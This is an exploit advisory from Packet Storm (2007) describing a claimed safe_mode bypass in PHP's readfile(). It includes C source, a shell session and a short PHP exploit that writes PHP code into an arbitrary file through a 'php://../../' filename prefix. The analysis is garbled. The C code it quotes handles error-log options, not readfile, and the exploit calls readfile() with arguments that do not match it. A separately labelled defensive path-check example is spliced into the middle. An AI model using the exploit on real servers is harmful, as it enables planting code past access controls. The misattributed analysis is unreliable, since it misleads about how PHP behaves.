php-readfile.txt

2007-03-27T00:00:00
ID PACKETSTORM:55385
Type packetstorm
Reporter ThE-WolF-ksA
Modified 2007-03-27T00:00:00

Description

                                        
                                            `SecurityRisk : DEN  
Remote Exploit : No  
Local Exploit : Yes  
Exploit Given : Yes  
Credit : The-WolF-kSA  
Date : 24.3.2007  
  
  
Affected Software : PHP 5.2.1/ 5.1.6 / 4.4.4  
  
  
[readfile() Safe Mode Bypass PHP 5.2.1/ 5.1.6 / 4.4.4]  
  
Author: ThE-WoLf-KsA
Date:
-Written: 24.3.2007
  
  
--- 0. Description ---
  
  
--- 1. readfile() Safe Mode Bypass ---
The readfile() function reads a file and sends it to the output, and in the
form shown here it can also write into files. The issue is very simple:
readfile() checks safe_mode and open_basedir inside the stream functions, but
URL-style filenames are not supposed to be allowed, and the problem lies in
how an incorrectly formed filename is handled.
  
PHP5:
-2013-2050---
PHPAPI int _php_readfile(int opt_err, char *message, char *opt, char *headers TSRMLS_DC)
{
    php_stream *stream = NULL;

    switch (opt_err) {

        case 1: /* send an email */
        {
#if HAVE_SENDMAIL
            if (!php_mail(opt, "PHP error_log message", message, headers, NULL TSRMLS_CC)) {
                return FAILURE;
            }
#else
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mail option not available!");
            return FAILURE;
#endif
        }
        break;

        case 2: /* send to an address */
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "TCP/IP option not available!");
            return FAILURE;
            break;

        case 3: /* save to a file */
            stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
            if (!stream)
                return FAILURE;
            php_stream_write(stream, message, strlen(message));
            php_stream_close(stream);
            break;

        default:
            php_log_err(message TSRMLS_CC);
            break;
    }
    return SUCCESS;
}
-2013-2050---
  
Let's look at option 3.
  
-2038 line---
stream = php_stream_open_wrapper(opt, "a", IGNORE_URL | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL);
-2038 line---
  
Mode "a" appends the message to the file, or creates a new file if it does not
exist.
The problem is that php_stream_open_wrapper() is called with "IGNORE_URL"
set.
With IGNORE_URL, the safe_mode check is switched off when the filename uses the
form "prefix://../../".
  
-Example---
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "/www/temp/sr.php");'

Warning: readfile(): SAFE MODE Restriction in effect. The script whose uid is 0 is not allowed to access /www/temp owned by uid 80 in Command line code on line 1

Warning: readfile(/www/temp/sr.php): failed to open stream: Invalid argument in Command line code on line 1
cxib# php -r 'readfile("<? echo \"cx\"; ?>", 3, "php://../../www/temp/sr.php");'
cxib# ls -la /www/temp/sr.php
-rw-r--r-- 1 cxib www 16 Jun 11 17:47 /www/temp/sr.php
cxib#
-Example---
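The defensive counterpart to the wrapper-prefix trick shown above, as an added example that is not part of the advisory: a user-supplied filename is confined to a base directory before it reaches any stream function, rather than trusting safe_mode. The function name and the sample inputs are constructed for this demonstration.

```php
<?php
// Added example, not part of the advisory: confine a user-supplied filename to a
// base directory before it reaches any stream function, instead of relying on
// safe_mode. The function name and sample inputs are constructed for this demo.
function resolve_within_base(string $base, string $name): ?string
{
    // A scheme prefix such as "php://" selects a stream wrapper; that is what the
    // "php://../../" form in the advisory abuses, so refuse it outright. NUL bytes
    // would truncate the C-level path, so refuse those too.
    if (preg_match('#^[a-zA-Z][a-zA-Z0-9+.-]*://#', $name) || strpos($name, "\0") !== false) {
        return null;
    }
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    $candidate = $baseReal . DIRECTORY_SEPARATOR . $name;
    $leaf = basename($candidate);
    if ($leaf === '.' || $leaf === '..' || $leaf === '') {
        return null;
    }
    // realpath() collapses "../" segments in the parent; it must already exist.
    $dir = realpath(dirname($candidate));
    if ($dir === false) {
        return null;
    }
    $resolved = $dir . DIRECTORY_SEPARATOR . $leaf;
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // Only paths that resolve to something under the base directory are accepted.
    return strncmp($resolved, $prefix, strlen($prefix)) === 0 ? $resolved : null;
}

// Demonstration with a temporary directory (constructed inputs).
$base = sys_get_temp_dir() . '/readfile_demo_' . getmypid();
mkdir($base);
mkdir($base . '/sub');
$tests = [
    'sr.php',                       // accepted: plain name inside the base
    'sub/../sr.php',                // accepted: normalises to <base>/sr.php
    '../../etc/passwd',             // rejected: resolves outside the base
    'php://../../www/temp/sr.php',  // rejected: wrapper prefix from the advisory
];
foreach ($tests as $t) {
    $r = resolve_within_base($base, $t);
    printf("%-30s => %s\n", $t, $r === null ? 'REJECTED' : 'ACCEPTED ' . $r);
}
rmdir($base . '/sub');
rmdir($base);
```

The accepted path is the only one that should ever be handed to readfile() or any other stream function.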
  
--- 2. Exploit ---
<?php
$file = ""; # FILENAME
readfile("<? echo \"cx\"; ?>", 3, "php://../../" . $file);
?>
  
  
  
--- 4. Greets ---
SniPer_hex  
  
--- 5. Contact ---
ThE-WolF-ksA@hotmail.com  